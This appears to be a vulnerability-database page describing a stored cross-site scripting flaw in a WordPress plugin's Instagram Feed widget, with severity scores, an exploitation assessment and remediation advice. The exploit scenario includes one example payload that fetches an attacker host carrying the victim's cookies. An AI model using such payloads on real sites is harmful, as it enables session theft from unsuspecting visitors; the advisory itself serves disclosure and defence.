EUVD-2026-23340Severity by source
AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
Primary rating from NVD · only source for this CVE.
CVSS VectorNVD
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
Lifecycle Timeline
4DescriptionCVE.org
The Royal Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Instagram Feed widget's 'instagram_follow_text' setting in all versions up to, and including, 1.7.1056 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
AnalysisAI
Stored Cross-Site Scripting in Royal Addons for Elementor plugin versions up to 1.7.1056 allows authenticated attackers with Contributor-level access to inject arbitrary JavaScript via the Instagram Feed widget's 'instagram_follow_text' setting, executing malicious scripts whenever users view affected pages. The vulnerability stems from insufficient input sanitization and output escaping in the widget configuration handler. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Exploitation requires three concrete, specific conditions: (1) the Royal Addons for Elementor plugin must be installed and activated on the WordPress site, (2) the attacker must possess or compromise a WordPress user account with at least Contributor-level role (Contributor, Editor, or Administrator), which grants permission to edit pages and access the Elementor page builder widget editor, and (3) a page or post must contain the Instagram Feed widget with the 'instagram_follow_text' setting rendered on the front-end (not in draft or trash). … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | The risk is moderate to moderately-high within WordPress environments running the plugin, but context-dependent. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An attacker with a compromised Contributor account (or granted legitimate Contributor access via social engineering) logs into WordPress admin, navigates to a page using the Instagram Feed widget, and edits the widget settings to inject malicious JavaScript into the 'instagram_follow_text' field (e.g., '<img src=x onerror="fetch(attacker.com?c='+document.cookie+')">Follow'). The payload is saved to the database without sanitization. … |
| Remediation | Update Royal Addons for Elementor to the patched version released after 1.7.1056 (consult the WordPress plugin repository for the latest stable version, or monitor Wordfence advisory at https://www.wordfence.com/threat-intel/vulnerabilities/id/16d083bc-d726-4291-bc6d-a7bf83fa78c3 for the specific fix version). … Detailed patch versions, workarounds, and compensating controls in full report. |
Threat intelligence, references, and detailed analysis are available after sign-in.
More from same product – last 7 days
The Vitepos WordPress plugin before 3.4.2 does not properly restrict the roles that can be assigned when creating new u
The weMail: Email Marketing, Email Automation, Newsletters, Subscribers & Email Optins for WooCommerce WordPress plugin
The Taskbuilder WordPress plugin before 5.0.8 does not properly sanitise a URL parameter before echoing it into inline
The ultimate-woocommerce-auction-pro WordPress plugin through 2.4.5 does not sanitise and escape a parameter before outp
The Transbank Webpay WordPress plugin before 1.14.0 does not sanitize and escape logs to be displayed, allowing unauthen
Share
External POC / Exploit Code
Leaving vuln.today